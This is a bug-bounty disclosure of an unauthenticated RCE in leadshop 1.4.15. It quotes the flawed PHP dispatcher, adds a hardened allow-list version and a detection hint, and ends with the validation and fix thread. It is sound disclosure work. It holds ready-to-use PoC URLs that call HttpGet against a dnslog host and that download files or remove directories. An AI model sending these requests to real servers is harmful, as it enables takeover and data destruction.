There is an RCE vulnerability in qmpaas/leadshop

Valid

Reported on

Nov 7th 2022


Description

There is an RCE vulnerability in qmpaas/leadshop (https://github.com/qmpaas/leadshop) (v1.4.15). An attacker can request the file leadshop.php and invoke any existing method of the installer class through GET parameters, thereby taking control of the target host.
The vulnerable code is in leadshop/web/leadshop.php, lines 27-61:

    public function run()
    {
        // Read the request parameters
        $include = isset($_GET['include']) ? $_GET['include'] : "";
        $data    = isset($_GET['data']) ? $_GET['data'] : "";
        $meta    = isset($_GET['meta']) ? $_GET['meta'] : "";
        // Invoke the requested method with the supplied arguments
        if ($include) {
            return call_user_func_array([$this, $include], [$meta, $data]);
        } else {
            // Used to detect unauthorised operations
            $token = isset($_GET['token']) ? $_GET['token'] : "";
            $html  = get_oss_url('index.html');
            // If the lock file exists, an update is being performed
            if (@file_exists(dirname(__DIR__) . "/install.lock")) {
                if (@file_get_contents(dirname(__DIR__) . "/install.lock") === $token) {
                    if (!isset($_SESSION['self_update'])) {
                        // Update the installer itself
                        $this->SilentSelfUpdate();
                    }
                    // Perform the update
                    $version = get_version();
                    $body    = $this->DownloadFile($html);
                    echo str_replace('{$version}', $version, $body);
                } else {
                    die("检测到非法Token,请登录后台进入更新界面");
                }
            } else {
                $version = get_version();
                $body    = $this->DownloadFile($html);
                echo str_replace('{$version}', $version, $body);
            }
        }
    }

The method name is passed straight to call_user_func_array, and $include, $data and $meta are all read from GET parameters. Note that the token check only runs in the else branch, so it is never reached when include is set. As a result, an unauthenticated caller can run any method of this class that takes two or fewer arguments, for example:
HttpGet (outbound HTTP request; PoC: https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn),
ToMkdir (create a folder; PoC: https://demo.leadshop.vip/leadshop.php?include=ToMkdir&meta=1),
UpdateSql (perform a database update; PoC: https://demo.leadshop.vip/leadshop.php?include=UpdateSql),
DownloadFile (download a file to the server; PoC: https://demo.leadshop.vip/leadshop.php?include=DownloadFile&meta=www.baidu.com/img/flexible/logo/pc/peak-result.png),
RemoveDir (remove a directory; PoC: https://demo.leadshop.vip/leadshop.php?include=RemoveDir&meta=[path]).
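The root cause above is a dynamic method dispatch keyed on an untrusted string, combined with an authentication check that sits on the wrong branch. The following is an added example of how such a dispatcher can be hardened; it is not leadshop's own code and not the fix shipped in 1.4.16. The method names, the install.lock token file and the GET parameter names follow the report; the class name LeadshopInstaller, the allow-list contents and the method bodies are assumptions made for illustration.

```php
<?php
// Added example, not leadshop's own code. Hardened version of the run()
// dispatcher: every request is authenticated against the install.lock token
// first, and the method name is resolved against a fixed allow-list instead
// of "any method this class happens to have".

final class LeadshopInstaller
{
    // Methods reachable through ?include=... (constructed list; the real set
    // would be decided per deployment and kept as small as possible).
    private const DISPATCHABLE = ['UpdateSql' => true];

    private string $lockFile;

    public function __construct(string $lockFile)
    {
        $this->lockFile = $lockFile;
    }

    /** @param array<string,mixed> $get  the request query parameters ($_GET) */
    public function run(array $get): string
    {
        $include = (string)($get['include'] ?? '');
        $data    = (string)($get['data'] ?? '');
        $meta    = (string)($get['meta'] ?? '');
        $token   = (string)($get['token'] ?? '');

        // 1. Authenticate before anything else. In the vulnerable code the
        //    token was only checked when no include parameter was present.
        if (!$this->tokenIsValid($token)) {
            http_response_code(403);
            return 'invalid token';
        }

        if ($include === '') {
            return $this->renderIndex();
        }

        // 2. Allow-list lookup: an unknown name is rejected instead of being
        //    handed to call_user_func_array. method_exists is a second guard
        //    against a stale allow-list entry.
        if (!isset(self::DISPATCHABLE[$include]) || !method_exists($this, $include)) {
            http_response_code(400);
            return 'unknown action';
        }

        // Only names that survived the allow-list check reach this point.
        return (string)$this->{$include}($meta, $data);
    }

    private function tokenIsValid(string $token): bool
    {
        if ($token === '' || !is_file($this->lockFile)) {
            return false;
        }
        $expected = trim((string)file_get_contents($this->lockFile));
        // hash_equals compares in constant time; === on a secret leaks timing.
        return $expected !== '' && hash_equals($expected, $token);
    }

    private function renderIndex(): string
    {
        // Placeholder for the index.html rendering done by the original code.
        return '<html><body>installer</body></html>';
    }

    // Hypothetical body; in leadshop this performs the schema update.
    private function UpdateSql(string $meta, string $data): string
    {
        return 'update performed';
    }
}

// Entry point, mirroring how web/leadshop.php would be invoked.
$installer = new LeadshopInstaller(dirname(__DIR__) . '/install.lock');
echo $installer->run($_GET);
```

With this structure the requests listed above (HttpGet, ToMkdir, DownloadFile, RemoveDir) are refused with 400 even by an authenticated caller, and an unauthenticated caller never gets past the 403. On the detection side, any request to leadshop.php whose query string carries include= together with a meta= or data= value is worth alerting on, since the legitimate update flow never sets include from the browser.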

Proof of Concept:

https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn

DNSLOG screenshot (image not preserved in this copy).

Impact

Attackers can call any existing method at will and make the target server perform outbound requests, download files, create files, delete files, and so on.
The outbound access can turn the server into a source of DoS traffic.
The download capability lets an attacker fetch a PHP trojan onto the server.
Creating and deleting files will disrupt normal service.
More than ten IPs are using this service.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 22 days ago
ouroborosscr modified the report
22 days ago
ouroborosscr modified the report
22 days ago
ouroborosscr modified the report
22 days ago
ouroborosscr modified the report
21 days ago
ouroborosscr
21 days ago

Researcher


Hi, @admin. Thanks. Could you please contact the maintainer?

We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 21 days ago
ouroborosscr
21 days ago

Researcher


Hi, @admin. Can I contact the maintainer to agree to assign a CVE? Thanks.

ouroborosscr modified the report
21 days ago
ouroborosscr modified the report
21 days ago
ouroborosscr modified the report
21 days ago
Pavlos
19 days ago

Admin


Hey 👋 Before a CVE can be assigned, the maintainer first has to validate your report and fix the vulnerability. At that point they will be asked if they want to assign a CVE, just before they go public with the disclosure.

leadshop开源商城
14 days ago

Maintainer


Great work @ouroborosscr 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

leadshop开源商城 validated this vulnerability 14 days ago
ouroborosscr has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
ouroborosscr submitted a
5 days ago
leadshop开源商城 gave praise 5 days ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
leadshop开源商城 marked this as fixed in 1.4.16 with commit f27e9c 5 days ago
ouroborosscr has been awarded the fix bounty
This vulnerability has been assigned a CVE
ouroborosscr
5 days ago

Researcher


@admin can we assign a CVE here?

ouroborosscr
5 days ago

Researcher


@admin I contacted the maintainer to agree to assign a CVE. He said: "I did it. See if it's right?" "The first time I used this platform." The first time I used this platform. Thanks.

ouroborosscr
5 days ago

Researcher


@admin I contacted the maintainer to agree to assign a CVE. He said: "I did it. See if it's right?" "The first time I used this platform." Please help us finish the work. Thanks.

leadshop开源商城 published this vulnerability 5 days ago